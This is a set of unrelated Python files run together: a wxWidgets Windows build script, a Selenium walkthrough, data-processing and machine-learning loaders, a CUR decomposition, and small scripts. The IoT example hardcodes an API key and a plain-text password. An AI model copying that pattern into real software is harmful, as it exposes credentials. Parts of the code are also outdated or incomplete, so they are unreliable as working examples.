        """True when running under AppVeyor CI (APPVEYOR env var is 'true')."""
        return os.environ.get('APPVEYOR', '').lower().strip() == 'true'

    def append_appveyor(self, args):
        """Append the AppVeyor msbuild logger argument, but only on CI."""
        if not self.is_appveyor():
            return
        args.append(self.appveyor_msbuild)
###############################################################################
## Functions
def setup() -> Settings:
    """Collect the build paths/options for the current checkout into Settings."""
    root = os.getcwd()
    dependencies_dir = os.path.join(root, 'dependencies')
    dist_dir = os.path.join(root, 'dist')
    wx_dir = os.path.join(dependencies_dir, 'wx')
    build_dir = os.path.join(root, 'build')
    logger_arg = r'/logger:C:\Program Files\AppVeyor\BuildAgent\Appveyor.MSBuildLogger.dll'
    # Default to 64-bit unless the CI environment explicitly requests x86.
    platform = 'Win32' if os.environ.get('PLATFORM', 'unknown') == 'x86' else 'x64'
    return Settings(root, dependencies_dir, dist_dir, wx_dir, build_dir, logger_arg, platform)
def verify_dir_exist(path):
    """Create *path* (including missing parents) if it does not already exist.

    Uses exist_ok=True so reruns and concurrent callers cannot race between
    the existence check and the creation -- the original isdir()+makedirs()
    pair could raise FileExistsError under that race.
    """
    os.makedirs(path, exist_ok=True)
def download_file(url, path):
    """Fetch *url* into *path*, skipping the download when the file exists."""
    if os.path.isfile(path):
        print("Already downloaded", path)
        return
    urllib.request.urlretrieve(url, path)
def list_projects_in_solution(path):
    """Return the path of every project referenced by a .sln file.

    Each project path from the solution is joined onto the solution's own
    directory.
    """
    # Example line:
    # Project("{8BC9CEB8-...}") = "richtext", "wx_richtext.vcxproj", "{7FB0...}"
    project_line = re.compile(r'Project\("[^"]+"\) = "[^"]+", "([^"]+)"')
    base_dir = os.path.dirname(path)
    projects = []
    with open(path) as sln:
        for line in sln:
            match = project_line.match(line)
            if match:
                projects.append(os.path.join(base_dir, match.group(1)))
    return projects
def add_definition_to_project(path, define):
    """Prepend *define* to every <PreprocessorDefinitions> list in a project file, in place."""
    # Example line:
    # <PreprocessorDefinitions>WIN32;_LIB;...;%(PreprocessorDefinitions)</PreprocessorDefinitions>
    preproc = re.compile(r'([ ]*<PreprocessorDefinitions>)([^<]*</PreprocessorDefinitions>)')
    rewritten = []
    with open(path) as project:
        for line in project:
            match = preproc.match(line)
            if match:
                rewritten.append('{0}{1};{2}'.format(match.group(1), define, match.group(2)))
            else:
                rewritten.append(line.rstrip())
    with open(path, mode='w') as project:
        for line in rewritten:
            project.write(line + '\n')
# Rewrites <RuntimeLibrary> settings so the project links the CRT statically:
#   MultiThreadedDebugDLL -> MultiThreadedDebug
#   MultiThreadedDLL      -> MultiThreaded
def change_to_static_link(path):
    """Switch every RuntimeLibrary entry in a project file from DLL to static CRT, in place."""
    mtdebug = re.compile(r'([ ]*)<RuntimeLibrary>MultiThreadedDebugDLL')
    mtrelease = re.compile(r'([ ]*)<RuntimeLibrary>MultiThreadedDLL')
    rewritten = []
    with open(path) as project:
        for line in project:
            debug_match = mtdebug.match(line)
            release_match = mtrelease.match(line)
            if debug_match:
                print('in {project} changed to static debug'.format(project=path))
                rewritten.append('{spaces}<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>'.format(spaces=debug_match.group(1)))
            elif release_match:
                print('in {project} changed to static release'.format(project=path))
                rewritten.append('{spaces}<RuntimeLibrary>MultiThreaded</RuntimeLibrary>'.format(spaces=release_match.group(1)))
            else:
                rewritten.append(line.rstrip())
    with open(path, mode='w') as project:
        for line in rewritten:
            project.write(line + '\n')
def change_all_projects_to_static(sln):
    """Switch every project of the solution to static CRT linkage."""
    for project_path in list_projects_in_solution(sln):
        change_to_static_link(project_path)
def add_definition_to_solution(sln, definition):
    """Add a preprocessor definition to every project of the solution."""
    for project_path in list_projects_in_solution(sln):
        add_definition_to_project(project_path, definition)
def make_single_project_64(project_path, rep):
    """Run the TextReplacer *rep* over every line of a project file, in place.

    Missing files are reported and skipped rather than raising.
    """
    if not os.path.isfile(project_path):
        print('missing ' + project_path)
        return
    with open(project_path) as project:
        converted = [rep.replace(line.rstrip()) for line in project]
    with open(project_path, 'w') as project:
        for line in converted:
            project.write(line + '\n')
def make_projects_64(sln):
    """Convert every project of the solution from Win32 to x64 settings."""
    conversions = TextReplacer()
    conversions.add('Win32', 'x64')
    # Edit-and-continue debug info is not available for x64 targets.
    conversions.add('<DebugInformationFormat>EditAndContinue</DebugInformationFormat>', '<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>')
    conversions.add('<TargetMachine>MachineX86</TargetMachine>', '<TargetMachine>MachineX64</TargetMachine>')
    # protobuf specific hack since cmake looks in x64 folder
    conversions.add(r'<OutDir>Release\</OutDir>', r'<OutDir>x64\Release\</OutDir>')
    conversions.add(r'<OutDir>Debug\</OutDir>', r'<OutDir>x64\Debug\</OutDir>')
    for project_path in list_projects_in_solution(sln):
        make_single_project_64(project_path, conversions)
def make_solution_64(solution_path):
    """Rewrite the solution file itself to target x64 instead of Win32."""
    win32_to_x64 = TextReplacer().add('Win32', 'x64')
    with open(solution_path) as solution_handle:
        converted = [win32_to_x64.replace(line.rstrip()) for line in solution_handle]
    with open(solution_path, 'w') as solution_handle:
        for line in converted:
            solution_handle.write(line + '\n')
def convert_sln_to_64(sln):
    """Convert a solution and all of its projects from Win32 to x64."""
    # Solution first, then the projects it references.
    make_solution_64(sln)
    make_projects_64(sln)
def extract_zip_to(path_to_zip, target):
    """Extract the whole archive at *path_to_zip* into directory *target*.

    NOTE(review): extractall trusts archive member names; only use on
    archives we created or downloaded from a trusted source.
    """
    with zipfile.ZipFile(path_to_zip, 'r') as archive:
        archive.extractall(target)
###############################################################################
## Commands
def handle_make_solution_64_cmd(args):
    """CLI handler: upgrade the solution given in args.sln to x64."""
    convert_sln_to_64(args.sln)
def handle_change_all_projects_to_static_cmd(args):
    """CLI handler: switch every project in args.sln to the static CRT."""
    change_all_projects_to_static(args.sln)
def handle_list_projects_cmd(cmd):
    """CLI handler: print every project referenced by cmd.sln."""
    for project_path in list_projects_in_solution(cmd.sln):
        print("project", project_path)
def handle_add_definition_cmd(args):
    """CLI handler: add preprocessor definition args.define to args.project."""
    add_definition_to_project(args.project, args.define)
def handle_change_to_static_cmd(args):
    """CLI handler: switch a single project (args.project) to the static CRT."""
    change_to_static_link(args.project)
def handle_install_cmd(args):
    """CLI handler: download wxWidgets, switch it to static CRT and build it.

    With --nobuild the msbuild command line is printed instead of executed.
    """
    settings = setup()
    build = args.build
    wx_url = "https://github.com/wxWidgets/wxWidgets/releases/download/v3.1.4/wxWidgets-3.1.4.zip"
    wx_zip = os.path.join(settings.install_dist, "wx.zip")
    wx_sln = os.path.join(settings.wx_root, 'build', 'msw', 'wx_vc16.sln')
    print('Root:', settings.root)
    print('wxWidgets solution: ', wx_sln)
    verify_dir_exist(settings.install_dist)
    verify_dir_exist(settings.wx_root)
    print("downloading wx...")
    # wx_zip is already an absolute path; the original re-joined it onto
    # install_dist, which os.path.join ignores for absolute second arguments.
    download_file(wx_url, wx_zip)
    print("extracting wx")
    extract_zip_to(wx_zip, settings.wx_root)
    print("changing wx to static")
    change_all_projects_to_static(wx_sln)
    print("building wxwidgets")
    print("-----------------------------------")
    wx_msbuild_cmd = [
        'msbuild',
        '/p:Configuration=Release',
        '/p:Platform={}'.format(settings.platform)
    ]
    # The AppVeyor logger is only added when running on CI.
    settings.append_appveyor(wx_msbuild_cmd)
    wx_msbuild_cmd.append(wx_sln)
    if build:
        # Flush so our prints appear before msbuild's output in CI logs.
        sys.stdout.flush()
        subprocess.check_call(wx_msbuild_cmd)
    else:
        print(wx_msbuild_cmd)
def handle_cmake_cmd(_):
    """CLI handler: generate the Visual Studio build tree with cmake.

    Directory creation uses exist_ok=True so the command is re-runnable;
    the original bare os.makedirs calls raised FileExistsError on a second
    invocation.
    """
    settings = setup()
    subinstall = os.path.join(settings.install, 'windows', settings.platform)
    os.makedirs(settings.build, exist_ok=True)
    os.makedirs(settings.install, exist_ok=True)
    os.makedirs(subinstall, exist_ok=True)
    generator = 'Visual Studio 16 2019'
    # NOTE(review): the %VAR% placeholders are expanded by the AppVeyor
    # shell, not by Python -- they pass through literally elsewhere.
    cmakecmd = [
        'cmake',
        "-DCMAKE_INSTALL_PREFIX={}".format(subinstall),
        "-DwxWidgets_ROOT_DIR={}".format(settings.wx_root),
        "-DRIDE_BUILD_COMMIT=%APPVEYOR_REPO_COMMIT%",
        "-DRIDE_BUILD_NUMBER=%APPVEYOR_BUILD_NUMBER%",
        "-DRIDE_BUILD_BRANCH=%APPVEYOR_REPO_BRANCH%",
        "-DRIDE_BUILD_REPO=%APPVEYOR_REPO_NAME%",
        '-G', generator,
        '-A', settings.platform,
        settings.root
    ]
    sys.stdout.flush()
    subprocess.check_call(cmakecmd, cwd=settings.build)
def handle_build_cmd(_):
    """CLI handler: build the packaging project with msbuild."""
    settings = setup()
    ride_sln = os.path.join(settings.build, 'PACKAGE.vcxproj')
    ride_msbuild_cmd = [
        'msbuild',
        '/p:Configuration=Release',
        '/p:Platform={}'.format(settings.platform)
    ]
    # Only pass the AppVeyor logger when actually running on AppVeyor,
    # matching handle_install_cmd; unconditionally appending it (as the
    # original did) points msbuild at a logger DLL that does not exist
    # on local machines.
    settings.append_appveyor(ride_msbuild_cmd)
    ride_msbuild_cmd.append(ride_sln)
    sys.stdout.flush()
    subprocess.check_call(ride_msbuild_cmd)
def handle_print_cmd(_):
    """CLI handler: dump the computed build settings to stdout."""
    setup().print()
###############################################################################
## Main
def main():
    """Parse the command line and dispatch to the chosen sub-command handler."""
    parser = argparse.ArgumentParser(description='Does the windows build')
    subparsers = parser.add_subparsers()

    install_parser = subparsers.add_parser('install')
    install_parser.set_defaults(func=handle_install_cmd)
    install_parser.add_argument('--nobuild', dest='build', action='store_const', const=False, default=True)

    list_parser = subparsers.add_parser('listprojects')
    list_parser.set_defaults(func=handle_list_projects_cmd)
    list_parser.add_argument('sln', help='solution file')

    static_project_parser = subparsers.add_parser('static_project')
    static_project_parser.set_defaults(func=handle_change_to_static_cmd)
    static_project_parser.add_argument('project', help='make a project staticly link to the CRT')

    to64_parser = subparsers.add_parser('to64')
    to64_parser.set_defaults(func=handle_make_solution_64_cmd)
    to64_parser.add_argument('sln', help='the solution to upgrade')

    static_solution_parser = subparsers.add_parser('static_sln')
    static_solution_parser.set_defaults(func=handle_change_all_projects_to_static_cmd)
    static_solution_parser.add_argument('sln', help='make all the projects in the specified solution staticly link to the CRT')

    add_define_parser = subparsers.add_parser('add_define')
    add_define_parser.set_defaults(func=handle_add_definition_cmd)
    add_define_parser.add_argument('project', help='project file')
    add_define_parser.add_argument('define', help='preprocessor to add')

    cmake_parser = subparsers.add_parser('cmake')
    cmake_parser.set_defaults(func=handle_cmake_cmd)

    build_parser = subparsers.add_parser('build')
    build_parser.set_defaults(func=handle_build_cmd)

    print_parser = subparsers.add_parser('print')
    print_parser.set_defaults(func=handle_print_cmd)

    args = parser.parse_args()
    # When no sub-command is given argparse leaves args.func unset; show
    # usage instead of crashing with AttributeError.
    if not hasattr(args, 'func'):
        parser.print_help()
        return
    args.func(args)


if __name__ == "__main__":
    main()
|
#in this script, we are going to do various things to interact with a webpage
from selenium import webdriver
beginning_url = 'https://flps.newberry.org/'
# Requires a chromedriver binary; opens a real browser window.
driver = webdriver.Chrome()
driver.get(beginning_url)
# now let us try to locate elements, and select data from these elements
# https://selenium-python.readthedocs.io/locating-elements.html
# NOTE(review): the selector below is left empty, so this lookup will fail
# until it is filled in.  The find_element_by_* helpers were removed in
# Selenium 4 -- confirm the installed Selenium version still provides them.
my_css_selector = ''
element = driver.find_element_by_css_selector(my_css_selector)
# Element data: visible text and an attribute value (results are discarded
# here; this file is a walkthrough of the API).
element.text
element.get_attribute('href')
#we can move the page (first number is x axis, second number is y axis)
driver.execute_script('window.scrollTo(0, 500)')
#we can search in search bars
searchbar = driver.find_element_by_css_selector('#search_terms')
searchbar.send_keys('Poland')
# AND we can click buttons
searchbutton = driver.find_element_by_css_selector('#search_button')
searchbutton.click()
#don't forget to close the driver
driver.close()
from datetime import datetime
import sys
"""
Converts human-readable timestamp into epoch milliseconds.
Input schema (CSV): station_id,bikes_available,docks_available,timestamp
Output schema (CSV): station_id,bikes_available,docks_available,timestamp (epoch milliseconds)
Usage: cat data/status.csv | python 1-parse-date-time.py > outfile.csv
"""
def parse_time(t):
    """Parse a double-quoted timestamp; the date may use '/' or '-' separators."""
    try:
        return datetime.strptime(t, '"%Y/%m/%d %H:%M:%S"')
    except ValueError:
        pass
    # Fall back to the dash-separated variant used by some exports.
    return datetime.strptime(t, '"%Y-%m-%d %H:%M:%S"')
# Stream CSV rows from stdin, replacing the quoted timestamp in column 4
# with epoch milliseconds.  The module docstring promises milliseconds, but
# the original emitted datetime.timestamp()'s fractional seconds; convert
# and truncate to an integer millisecond count here.
for line in sys.stdin:
    fields = line.strip().split(',')
    date = parse_time(fields[3])
    fields[3] = str(int(date.timestamp() * 1000))
    print(",".join(fields))
from django.contrib import admin
from .models import Post
# Register your models here.
class PostAdmin(admin.ModelAdmin):
    """Admin configuration for Post: list author id, timestamp, body and picture."""
    list_display = ("user_id", "created", "body", "picture")

# Register Post together with PostAdmin -- the original registered Post
# without it, so the list_display configuration above was never applied.
admin.site.register(Post, PostAdmin)
import SimpleITK as sitk
import numpy as np
import os
from keras.utils import to_categorical
def sliding_window(data_shape, window_size, moving_size):
    """Generate crop-cube corner coordinates by sliding a window over a volume.

    data_shape: size of the CT volume (first three axes are used)
    window_size: size of each cropped cube
    moving_size: sliding stride per axis

    A final window flush with the far edge is always appended on each axis
    so the whole volume is covered.  Returns a list of
    (z0, y0, x0, z1, y1, x1) tuples.
    """
    per_axis = []
    for axis in range(3):
        span = data_shape[axis] - window_size[axis]
        steps = span // moving_size[axis] + 1
        offsets = [step * moving_size[axis] for step in range(steps)]
        if len(offsets) == 0:
            # Window larger than the volume on this axis; log the shape
            # before the offsets[-1] access fails, as the original did.
            print (data_shape)
        if offsets[-1] != span:
            offsets.append(span)
        per_axis.append(offsets)
    corners = []
    for c0 in per_axis[0]:
        for c1 in per_axis[1]:
            for c2 in per_axis[2]:
                corners.append((c0, c1, c2, c0 + window_size[0], c1 + window_size[1], c2 + window_size[2]))
    return corners
class LobeData(object):
    """Loader for lung-lobe segmentation volumes stored as NIfTI files.

    Each case consists of an image, a 6-class lobe label map ('*_label'),
    a 2-class boundary map ('*_edge2') and a fissure probability map
    ('*_fissure_prob').  Whole volumes are returned together with the
    sliding-window coordinates used to cut training/testing cubes.
    """
    def __init__(self, window_size, moving_size, test_moving_size, train_path='./lobe_data/train/',
                 test_path='./lobe_data/test/'):
        """
        window_size: size of each cropped cube
        moving_size: sliding stride used when training
        test_moving_size: sliding stride used when testing
        train_path: directory containing the training data
        test_path: directory containing the test data
        """
        super(LobeData, self).__init__()
        self.train_path = train_path
        self.test_path = test_path
        self.window_size = window_size
        self.moving_size = moving_size
        self.test_moving_size = test_moving_size
        # Number of label classes (presumably 5 lobes + background -- confirm).
        self.num_classes = 6
    def one_hot(self, label, num_classes):
        """Convert an integer label volume to one-hot encoding.

        num_classes: number of classes (size of the new trailing axis)
        """
        new_shape = label.shape + (num_classes,)
        label = label.flatten()
        label = to_categorical(label, num_classes)
        one_hot_label = np.reshape(label, new_shape)
        return one_hot_label
    def load_train_data(self, validation=False):
        """Load every training case; with validation=True the last case is
        split off as a validation set.  Returns (images, fissure_pros),
        labels, edges and the filtered crop coordinates per case."""
        file_names = os.listdir(self.train_path)
        label_file_names = [f for f in file_names if f.endswith('_label.nii.gz')]
        label_file_names.sort()
        label_file_names = label_file_names
        # Image file name = label file name without the '_label' marker.
        data_file_names = [f.replace('_label', '') for f in label_file_names]
        file_num = len(data_file_names)
        dataset_coors = [] # shape = (dataset_size, VOI_nums, 3)
        images = []
        labels = []
        edges = []
        fissure_pros = []
        #
        # Running counts used to report the positive-voxel rate below.
        positive_num = 0.0
        voxel_num = 0.0
        class_num = np.zeros((6,))
        #
        for data_name, label_name in zip(data_file_names, label_file_names):
            print (data_name)
            # if data_name.endswith("7742.nii.gz"):
            #     print (data_name, "pass")
            #     continue
            itk_img = sitk.ReadImage(os.path.join(self.train_path, data_name))
            img = sitk.GetArrayFromImage(itk_img)
            itk_label = sitk.ReadImage(os.path.join(self.train_path, label_name))
            label = sitk.GetArrayFromImage(itk_label)
            edge_name = label_name.replace('_label', '_edge2')
            itk_edge = sitk.ReadImage(os.path.join(self.train_path, edge_name))
            edge = sitk.GetArrayFromImage(itk_edge)
            fissure_pro_name = label_name.replace('_label', '_fissure_prob')
            itk_fissure_pro = sitk.ReadImage(os.path.join(self.train_path, fissure_pro_name))
            fissure_pro = sitk.GetArrayFromImage(itk_fissure_pro)
            # Edge map is binary -> 2-channel one-hot.
            edge = self.one_hot(edge, 2)
            positive_num += np.sum(label > 0)
            label = self.one_hot(label, self.num_classes)
            # NOTE(review): the first astype is redundant -- the division
            # below casts again.  Presumably intensities are 0..255.
            img = img.astype(np.float32)
            img = img.astype(np.float32) / 255.0
            label = label.astype(np.float32)
            # label_num = np.sum(label, axis=(0,1,2))
            # class_num = class_num + label_num
            edge = edge.astype(np.float32)
            fissure_pro = fissure_pro.astype(np.float32)
            voxel_num += img.size
            # label = np.pad(label, 1, 'constant', constant_values=0)
            # Add a trailing channel axis for the network input.
            img = img[..., np.newaxis]
            fissure_pro = fissure_pro[..., np.newaxis]
            # label = label[..., np.newaxis]
            images.append(img)
            labels.append(label)
            edges.append(edge)
            fissure_pros.append(fissure_pro)
            # img.shape has 4 dims here; sliding_window only reads the first 3.
            coors = sliding_window(img.shape, self.window_size, self.moving_size)
            num = len(coors)
            filtered_coors = []
            for i in range(num):
                coor = coors[i]
                # Channel 0 of the one-hot label.  NOTE(review): channel 0 is
                # the class-0 (background?) plane -- confirm this filter keeps
                # the intended cubes.
                temp_label = label[coor[0]:coor[3],coor[1]:coor[4],coor[2]:coor[5],0:1]
                if np.sum(temp_label > 0) > 100:# and np.sum(temp_label) < 5000:###150
                    filtered_coors.append(coor)
            dataset_coors.append(filtered_coors)
        # print("class_num", class_num)
        # class_num = class_num / np.sum(class_num)
        # print("class_num", class_num)
        print("positive rate:%f" % (positive_num/voxel_num))
        if validation:
            # Last case becomes the validation split.
            return (images[0:file_num-1],fissure_pros[0:file_num-1]), labels[0:file_num-1], edges[0:file_num-1],\
                   dataset_coors[0:file_num-1], (images[file_num-1:file_num], fissure_pros[file_num-1:file_num]), labels[file_num-1:file_num], edges[file_num-1:file_num],\
                   dataset_coors[file_num-1:file_num]
        else:
            return (images,fissure_pros), labels, edges, dataset_coors
    def load_test_data(self):
        """Load every test case.  Unlike load_train_data, crop coordinates are
        not filtered and the case file names are returned as well."""
        file_names = os.listdir(self.test_path)
        label_file_names = [f for f in file_names if f.endswith('_label.nii.gz')]
        label_file_names.sort()
        label_file_names = label_file_names
        data_file_names = [f.replace('_label', '') for f in label_file_names]
        file_num = len(data_file_names)
        dataset_coors = [] # shape = (dataset_size, VOI_nums, 3)
        images = []
        labels = []
        edges = []
        fissure_pros = []
        test_names = []
        for data_name, label_name in zip(data_file_names, label_file_names):
            print (data_name)
            # if data_name.endswith("7734.nii.gz"):
            #     print (data_name, "pass")
            #     continue
            test_names.append(data_name)
            itk_img = sitk.ReadImage(os.path.join(self.test_path, data_name))
            img = sitk.GetArrayFromImage(itk_img)
            itk_label = sitk.ReadImage(os.path.join(self.test_path, label_name))
            label = sitk.GetArrayFromImage(itk_label)
            edge_name = label_name.replace('_label', '_edge2')
            itk_edge = sitk.ReadImage(os.path.join(self.test_path, edge_name))
            edge = sitk.GetArrayFromImage(itk_edge)
            fissure_pro_name = label_name.replace('_label', '_fissure_prob')
            itk_fissure_pro = sitk.ReadImage(os.path.join(self.test_path, fissure_pro_name))
            fissure_pro = sitk.GetArrayFromImage(itk_fissure_pro)
            edge = self.one_hot(edge, 2)
            label = self.one_hot(label, self.num_classes)
            img = img.astype(np.float32)
            img = img.astype(np.float32) / 255.0
            label = label.astype(np.float32)
            edge = edge.astype(np.float32)
            fissure_pro = fissure_pro.astype(np.float32)
            fissure_pro = fissure_pro[..., np.newaxis]
            # label = np.pad(label, 1, 'constant', constant_values=0)
            img = img[..., np.newaxis]
            # label = label[..., np.newaxis]
            images.append(img)
            labels.append(label)
            edges.append(edge)
            fissure_pros.append(fissure_pro)
            # Test-time stride; every window is kept (no filtering).
            coors = sliding_window(img.shape, self.window_size, self.test_moving_size)
            dataset_coors.append(coors)
        return (images,fissure_pros), labels, edges, dataset_coors, test_names
|
import numpy as np
from Vector2D import *
class AffineTransform:
    """Maps world coordinates (xMin..xMax, yMin..yMax) onto pixel coordinates
    of a drawing surface, flipping the y axis so world +y points up."""

    def __init__(self, drawingSurface, xMin, xMax, yMin, yMax):
        scale_x = drawingSurface.get_width() / (xMax - xMin)
        # Negative scale: screen y grows downward while world y grows upward.
        scale_y = -1.0 * drawingSurface.get_height() / (yMax - yMin)
        offset_x = -1.0 * scale_x * xMin
        offset_y = -1.0 * scale_y * yMax
        self.__drawingSurface = drawingSurface
        self.__translateAndScaleMatrix = np.array([[scale_x, 0, offset_x],
                                                   [0, scale_y, offset_y],
                                                   [0, 0, 1]])

    def transformCoord(self, pt: Vector2D):
        """Apply the affine map to *pt*; returns the transformed Vector2D."""
        homogeneous = self.__translateAndScaleMatrix.dot([pt.X, pt.Y, 1])
        return Vector2D(homogeneous[0], homogeneous[1])
# -*- coding: utf-8 -*-
"""
Iot dashboard POST example
iot-dashboard
IoT: Platform for Internet of Things
Iotdashboard source code is available under the MIT License
Online iot dashboard test and demo http://ihook.xyz
Online iot dashboard https://iothook.com
You can find project details on our project page https://iothook.com and wiki https://iothook.com
"""
import requests
import httplib, urllib
# Demo API key for the local iot-dashboard instance.
API_KEY = "0cd76eb-5f3b179"
url = 'http://localhost:8000/api/v1/data/' + API_KEY
# Python 2 script (print statement, urllib.urlencode); form-encode one sample.
datas = urllib.urlencode({"name_id":"test", "value":"45", })
# POST the sample with HTTP basic auth and print the requests Response object.
resp = requests.post(url, data=datas, auth=('iottestuser', 'iot12345**'))
print resp
|
# Read a salary and a growth percentage, then print the increased salary.
sahar = int(input("מהו השכר? "))
gidul = int(input("מה אחוז הגידול? "))
# Grow the salary by gidul percent.  The original printed
# sahar + gidul * 10, which only equals the grown salary when sahar == 1000.
print(sahar + sahar * gidul // 100)
__author__ = 'mcardle'
import numpy as np
class Trip(object):
    """Kinematic features derived from one trip's positional trace.

    trip_data is differenced once for velocity vectors and twice for
    tangential acceleration vectors; magnitudes and their differences are
    precomputed in __init__.  Presumably trip_data is an (n, 2) array of
    positions sampled at a fixed interval -- verify against the caller.
    """
    def __init__(self, id, trip_data):
        self.Id = id
        self.trip_data = trip_data
        # First differences of position = per-step velocity vectors.
        self.velocity_vectors = np.diff(trip_data, axis=0)
        # Second differences = tangential acceleration vectors.
        self.tang_accel_vectors = np.diff(self.velocity_vectors, axis=0)
        self.speed = Trip.normalize(self.velocity_vectors)
        self.tang_accel_mag = Trip.normalize(self.tang_accel_vectors)
        # Change in speed magnitude between consecutive samples.
        self.accel_mag = np.diff(self.speed, axis=0)
        self.delta_accel_mag = np.diff(self.accel_mag, axis=0)
        # Accelerations and (absolute) decelerations, separated by sign.
        self.accel_mag_pos = self.accel_mag[self.accel_mag > 0]
        self.accel_mag_neg = np.fabs(self.accel_mag[self.accel_mag < 0])
        # Sum of per-step distances; meters only if coordinates are metric.
        self.trip_len_meters = np.sum(self.speed, axis=0)
    def percentiles_accel(self):
        """Quartiles (25/50/75/100) of positive accelerations; zeros when none."""
        if len(self.accel_mag_pos) > 0:
            return np.percentile(self.accel_mag_pos, [25.0,50.0,75.0,100.0])
        else:
            return [0.0,0.0,0.0,0.0]
    def percentiles_decel(self):
        """Quartiles (25/50/75/100) of deceleration magnitudes; zeros when none."""
        if len(self.accel_mag_neg) > 0:
            return np.percentile(self.accel_mag_neg, [25.0,50.0,75.0,100.0])
        else:
            return [0.0,0.0,0.0,0.0]
    def percentiles_tang_accel(self):
        """Quartiles (25/50/75/100) of tangential acceleration magnitudes."""
        if len(self.tang_accel_mag) > 0:
            return np.percentile(self.tang_accel_mag, [25.0,50.0,75.0,100.0])
        else:
            return [0.0,0.0,0.0,0.0]
    def percentiles_delta_accel(self):
        """Quartiles (25/50/75/100) of acceleration changes (jerk-like values)."""
        if len(self.delta_accel_mag) > 0:
            return np.percentile(self.delta_accel_mag, [25.0,50.0,75.0,100.0])
        else:
            return [0.0,0.0,0.0,0.0]
    def percentiles_speed(self):
        """Quartiles (25/50/75/100) of per-step speed values."""
        if len(self.speed) > 0:
            return np.percentile(self.speed, [25.0,50.0,75.0,100.0])
        else:
            return [0.0,0.0,0.0,0.0]
    @staticmethod
    def _mean(value_array):
        """Mean of the array, or 0 for an empty array (np.mean warns on empty)."""
        if len(value_array)> 0:
            return np.mean(value_array)
        else:
            return 0
    @staticmethod
    def _std(value_array):
        """Standard deviation of the array, or 0 for an empty array."""
        if len(value_array)> 0:
            return np.std(value_array)
        else:
            return 0
    @staticmethod
    def indices_consec_zeros(value_array):
        """ Provide indices of subsequent consecutive zeros

        Returns every near-zero index that directly follows another
        near-zero index (i.e. the first index of each run is excluded).
        """
        indicies_list = []
        indices = Trip.find_zeros(value_array)
        # Sentinel guarantees the first index never counts as consecutive.
        last_val = -100
        for idx in indices:
            if idx == last_val + 1:
                indicies_list.append(idx)
            last_val = idx
        return indicies_list
    @staticmethod
    def find_zeros(speeds, tolerance = 0.2):
        """ Find indices of zeros
        :param speeds: array of speed values
        :param tolerance: value below that considered not moving
        :return: array of indices
        """
        return np.where(speeds < tolerance )[0]
    @staticmethod
    def normalize(vectors):
        """Euclidean norm of each row vector (one magnitude per sample)."""
        #...why faster than np.linalg.normalize???
        return np.sqrt(np.sum(vectors**2, axis=1))
import pickle
import time
import numpy as np
from src.utility import find_filter
from src.utility import final_results, svd_decomposition, SVD_K
def cur_decomposition(matrix, sample_r):
    """Perform CUR decomposition of a given matrix
    Parameters
    ----------
    matrix : numpy matrix
        A matrix of which CUR decomposition needs to be done
    sample_r : int
        Number of columns/rows sampled for the decomposition
    Returns
    -------
    tuple
        A tuple containing C, U and R matrix
    """
    try:
        # Reuse cached factors from a previous run, if present on disk.
        with open("files/cur_c", 'rb') as f:
            c = pickle.load(f)
        with open("files/cur_u", 'rb') as f:
            u = pickle.load(f)
        with open("files/cur_r", 'rb') as f:
            r = pickle.load(f)
    except FileNotFoundError:
        # Squared Frobenius norm; basis for the sampling probabilities.
        total = np.sum(matrix ** 2)
        rows, cols = matrix.shape
        # Column/row sampling probabilities proportional to squared norms.
        col_values = [np.sum(col ** 2) / total for col in matrix.T]
        row_values = [np.sum(row ** 2) / total for row in matrix]
        # Sampling is with replacement; duplicates are possible.
        random_cols = np.random.choice(range(0, cols), sample_r, p=col_values)
        random_rows = np.random.choice(range(0, rows), sample_r, p=row_values)
        c = matrix[:, random_cols]
        r = matrix[random_rows]
        # W: intersection of the sampled columns and rows.
        w = c[random_rows]
        # Rescale each sampled column/row by 1/sqrt(r * p), skipping
        # zero norms to avoid division by zero.
        for i in range(sample_r):
            norm = np.sqrt(sample_r * col_values[random_cols[i]])
            if norm > 0:
                c[:, i] /= norm
        for i in range(sample_r):
            norm = np.sqrt(sample_r * row_values[random_rows[i]])
            if norm > 0:
                r[i] /= norm
        # Build U from the SVD of W: U = Y (Sigma^+)^2 X^T.
        x, z, yt = svd_decomposition("cur_u_u", "cur_u_d", "cur_u_vt", w, sample_r)
        u = np.dot(np.dot(yt.T, np.linalg.pinv(z) ** 2), x.T)
        # Cache the factors for subsequent runs.
        with open("files/cur_c", 'wb+') as f:
            pickle.dump(c, f)
        with open("files/cur_u", 'wb+') as f:
            pickle.dump(u, f)
        with open("files/cur_r", 'wb+') as f:
            pickle.dump(r, f)
    return c, u, r
def get_cur_results(matrix):
    """Apply appropriate operations on a given matrix to use CUR technique to predict ratings
    Parameters
    ----------
    matrix : numpy matrix
        Original matrix on which CUR technique needs to be applied
    Returns
    -------
    tuple
        A tuple containing all performance measures of the CUR technique with and without 90% energy retention
    """
    # Sample size r*log10(r) derived from the global SVD rank constant.
    c, u, r = cur_decomposition(matrix, int(SVD_K * np.log10(SVD_K)))
    print("CUR Decomposition Done!")
    start = time.time()
    reconstructed_matrix = np.dot(np.dot(c, u), r)
    # Evaluate predictions only where actual ratings exist (non-zero cells).
    mask = (matrix > 0)
    actual = matrix[mask]
    predicted = reconstructed_matrix[mask]
    result_one = final_results(actual, predicted)
    print("Time taken for CUR = " + str(time.time() - start) + " seconds")
    start = time.time()
    # Truncate C, U and R to the rank that retains 90% of the energy in U.
    energy_filter = find_filter(u)
    c = c[:, 0:energy_filter]
    u = u[0:energy_filter, 0:energy_filter]
    r = r[0:energy_filter]
    reconstructed_matrix = np.dot(np.dot(c, u), r)
    predicted = reconstructed_matrix[mask]
    result_second = final_results(actual, predicted)
    print("Time taken for CUR with 90% energy = " + str(time.time() - start) + " seconds")
    return result_one, result_second
|
import re
# Instruction-matching patterns for the light-grid commands.  "\d+" was a
# non-raw string: \d is an invalid string escape (DeprecationWarning, and a
# SyntaxWarning on newer Pythons), so every pattern is a raw string now.
toggleRE = re.compile(r"toggle")
turnoffRE = re.compile(r"turn off")
turnonRE = re.compile(r"turn on")
cordsRE = re.compile(r"\d+")
# Edge length of the square light grid.
squareSize = 1000
def turnOn(num):
    """Part-two 'turn on': raise brightness by one."""
    return num + 1
def turnOff(num):
    """Part-two 'turn off': lower brightness by one, never below zero."""
    return num if num == 0 else num - 1
def toggle(num):
    """Part-two 'toggle': raise brightness by two."""
    return num + 2
# Apply every instruction from the puzzle input to a 1000x1000 brightness
# grid, dump the final rows to lightArray.txt and print total brightness.
